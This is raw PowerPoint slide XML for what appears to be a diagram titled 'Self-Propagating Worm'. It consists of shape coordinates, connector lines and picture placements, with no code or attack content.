            <a:off x="3366515" y="882396"/>
            <a:ext cx="5076825" cy="4430395"/>
            <a:chOff x="3366515" y="882396"/>
            <a:chExt cx="5076825" cy="4430395"/>
          </a:xfrm>
        </p:grpSpPr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FD6C99EF-41E4-56AC-1B65-EB05EB2CCD22}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4123943" y="2983738"/>
              <a:ext cx="1292860" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1292860">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1292669" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="33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90A9CC97-B4D7-1D30-36E0-BD06340663D8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5920739" y="1638300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9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4B700FD8-A2F6-E95C-2CAD-531FEF35E778}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6396037" y="2983738"/>
              <a:ext cx="1289685" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1289684">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1289494" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="33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59AF4A0C-8039-91D3-8F55-3C5C1F7F8B94}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6397751" y="3610356"/>
              <a:ext cx="608965" cy="1088390"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="608965" h="1088389">
                  <a:moveTo>
                    <a:pt x="608838" y="108800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0">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE7B067A-6F78-82F0-BB29-79C28C21C7E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6515" y="2616708"/>
              <a:ext cx="757427" cy="757427"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="21" name="object 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{776E73FD-C964-759C-BF63-6683DED990E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2787" y="882396"/>
              <a:ext cx="755903" cy="755903"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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D9907ADB-1F0D-1B46-1426-83A2B994192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5531" y="2593847"/>
              <a:ext cx="757427" cy="755903"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="object 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3418E13-53C3-2D2A-F29B-D55F9576050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1800" y="4556760"/>
              <a:ext cx="755903" cy="755904"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90FF626F-DAC2-7FAE-B915-7DAD5B2D17D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3279394" y="3358133"/>
            <a:ext cx="10655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D74A188-1241-4A0F-8F9A-2364BC37A4B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6709029" y="5285359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8" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEA924B3-7DE7-5123-4091-2CC5D7295324}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7527417" y="3340353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9" name="object 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A0FC846-B027-4D72-47C2-8715CB4FF995}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5475859" y="610870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17349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6FB101AE-B935-174C-AE12-5F38D48824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3724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Self-Propagating</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Worm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C0356DB-8380-F202-1CB3-84396F64E5F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1723" y="2362200"/>
            <a:ext cx="998220" cy="1266444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2F05A3BB-7EFD-8D47-607C-DBBA6BC1D06F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5603240" y="3609213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my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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34968307-C6AB-BA4E-3118-F3F4FBEBDFED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3366515" y="882396"/>
            <a:ext cx="5076825" cy="4430395"/>
            <a:chOff x="3366515" y="882396"/>
            <a:chExt cx="5076825" cy="4430395"/>
          </a:xfrm>
        </p:grpSpPr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2B1EA2BC-6263-D426-75C8-2A4F5C7B6A7E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4123943" y="2983738"/>
              <a:ext cx="1292860" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1292860">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1292669" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="33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485A9CD4-E91C-8E2A-C2E7-3B47A879CA78}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5920739" y="1638300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9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CDA15669-6D7C-67A8-DD4E-8AF69D9C5E23}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6396037" y="2983738"/>
              <a:ext cx="1289685" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1289684">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1289494" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="33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C5BCE25C-DFD0-5F33-B55A-E98384244E20}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6397751" y="3610356"/>
              <a:ext cx="608965" cy="1088390"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="608965" h="1088389">
                  <a:moveTo>
                    <a:pt x="608838" y="108800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10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A78751E4-75D1-B5C7-F6DD-8DE98711C6A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6515" y="2616708"/>
              <a:ext cx="757427" cy="757427"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="34" name="object 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF3CE6DB-024D-8055-384B-E23ABA0CD78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2787" y="882396"/>
              <a:ext cx="755903" cy="755903"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35" name="object 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D551CEC4-49C2-9386-5720-25487A08119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5531" y="2593847"/>
              <a:ext cx="757427" cy="755903"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="36" name="object 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{168E0132-BFAA-63A4-3B08-840771BBD1B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1800" y="4556760"/>
              <a:ext cx="755903" cy="755904"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E58D193A-E735-395B-BED4-5E139D6D3AAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3279394" y="3358133"/>
            <a:ext cx="10655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8" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F507280-4EC6-330A-6514-21BB875338E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6709029" y="5285359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9" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{805C02C4-B4C9-3EC2-00D5-8C33371270DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7527417" y="3340353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0" name="object 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C01F2573-A681-7E40-433D-1A1EC1B1423F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5475859" y="610870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1" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FA9B645-1DCF-B602-833B-543110B3BFE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="100584" y="265175"/>
            <a:ext cx="8961120" cy="6026150"/>
            <a:chOff x="100584" y="265175"/>
            <a:chExt cx="8961120" cy="6026150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="42" name="object 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D5904D5-D03D-22EE-97C4-959456CB758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5800" y="265175"/>
              <a:ext cx="755903" cy="755903"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="43" name="object 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E497F700-8D08-7EE7-2C10-9DD11EB05F2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4548" y="4829555"/>
              <a:ext cx="757427" cy="755904"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="44" name="object 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30F2366C-21E6-A0DC-C669-80A21716015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600" y="1371600"/>
              <a:ext cx="755904" cy="755903"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="object 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AF9B4DB-7B39-7468-01FB-07EE8B9D3A36}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1365503" y="1752600"/>
              <a:ext cx="2000885" cy="1243330"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2000885" h="1243330">
                  <a:moveTo>
                    <a:pt x="2000631" y="124294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23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C509E013-0B27-899F-F581-0A8A8AF2BA6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2572511"/>
              <a:ext cx="755904" cy="755903"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="object 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{368C74DA-5323-03BC-47AD-D455A921429F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1216151" y="2953511"/>
              <a:ext cx="2151380" cy="41910"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2151379" h="41910">
                  <a:moveTo>
                    <a:pt x="2150999" y="416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25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C071A3B5-6DFF-C9B8-2A37-C8679163B8A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000" y="3948684"/>
              <a:ext cx="755904" cy="757427"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="object 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA92E4CD-F683-FE32-C28B-EC0F469A8ED4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1360931" y="2996183"/>
              <a:ext cx="2005964" cy="1045210"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2005964" h="1045210">
                  <a:moveTo>
                    <a:pt x="2005457" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="104508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27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67997442-3398-91D1-BDB2-5809FD58C28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84" y="5533643"/>
              <a:ext cx="755904" cy="757428"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51" name="object 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EE5CA01-D2B4-BC32-663E-DBF19BA1818E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="551688" y="4698491"/>
              <a:ext cx="436245" cy="819150"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="436244" h="819150">
                  <a:moveTo>
                    <a:pt x="0" y="819022"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="436118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29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7C85FCF-D99F-EFD5-7D58-E57D8900D8A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3851" y="5516879"/>
              <a:ext cx="757427" cy="757427"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="object 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2DE28B5-155C-2AEA-DFD2-2D13BA397DB7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1388364" y="643127"/>
              <a:ext cx="7145655" cy="4942840"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7145655" h="4942840">
                  <a:moveTo>
                    <a:pt x="592074" y="4942332"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="3983736"/>
                  </a:lnTo>
                </a:path>
                <a:path w="7145655" h="4942840">
                  <a:moveTo>
                    <a:pt x="4008628" y="2895600"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3375660" y="4185030"/>
                  </a:lnTo>
                </a:path>
                <a:path w="7145655" h="4942840">
                  <a:moveTo>
                    <a:pt x="6916928" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4882896" y="607187"/>
                  </a:lnTo>
                </a:path>
                <a:path w="7145655" h="4942840">
                  <a:moveTo>
                    <a:pt x="7145274" y="347472"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6675119" y="1959483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1937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0E10ABD-C54A-B7D7-14C2-FFC7077159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3724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Self-Propagating</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Worm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A98694C2-4AFC-6162-0AF3-EBD2BB20201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1723" y="2362200"/>
            <a:ext cx="998220" cy="1266444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0B4A559F-5DFE-3705-7DDB-E5059A0A3A3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5603240" y="3609213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my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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6467C71F-75D1-5D39-22B4-D5579E069E35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3366515" y="882396"/>
            <a:ext cx="5076825" cy="4430395"/>
            <a:chOff x="3366515" y="882396"/>
            <a:chExt cx="5076825" cy="4430395"/>
          </a:xfrm>
        </p:grpSpPr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BE349C80-9E2E-ADEF-645C-FBE347405987}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4123943" y="2983738"/>
              <a:ext cx="1292860" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1292860">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1292669" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="33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1E25B8B8-3D3B-EE36-2854-94E42FCF51B3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5920739" y="1638300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9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AF47C780-9D05-026E-D299-0019E3DDB6DA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6396037" y="2983738"/>
              <a:ext cx="1289685" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1289684">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1289494" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="33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14315749-BF52-ECA9-BC22-4682A8CFD25B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6397751" y="3610356"/>
              <a:ext cx="608965" cy="1088390"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="608965" h="1088389">
                  <a:moveTo>
                    <a:pt x="608838" y="108800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0">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A4EC533-B234-46AE-87BD-AF6627AFA48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6515" y="2616708"/>
              <a:ext cx="757427" cy="757427"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="21" name="object 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5925D005-2CCB-AFED-2750-3C6181C723A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2787" y="882396"/>
              <a:ext cx="755903" cy="755903"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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A44AE30A-224E-1BEE-9907-3ACF0ACA787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5531" y="2593847"/>
              <a:ext cx="757427" cy="755903"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="object 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{593D49D9-B6F9-CC1B-5B45-35B9F586E64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1800" y="4556760"/>
              <a:ext cx="755903" cy="755904"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A964F366-889C-32A7-A50F-4E8DA8CA125C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3279394" y="3358133"/>
            <a:ext cx="10655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D7850537-2F3E-18F8-8E90-39790EE11201}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6709029" y="5285359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8" name="object 16">
            <a:extLst>
